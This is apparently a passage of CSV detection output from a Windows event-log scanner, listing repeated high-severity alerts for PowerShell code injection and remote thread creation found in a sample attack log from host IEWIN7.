Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 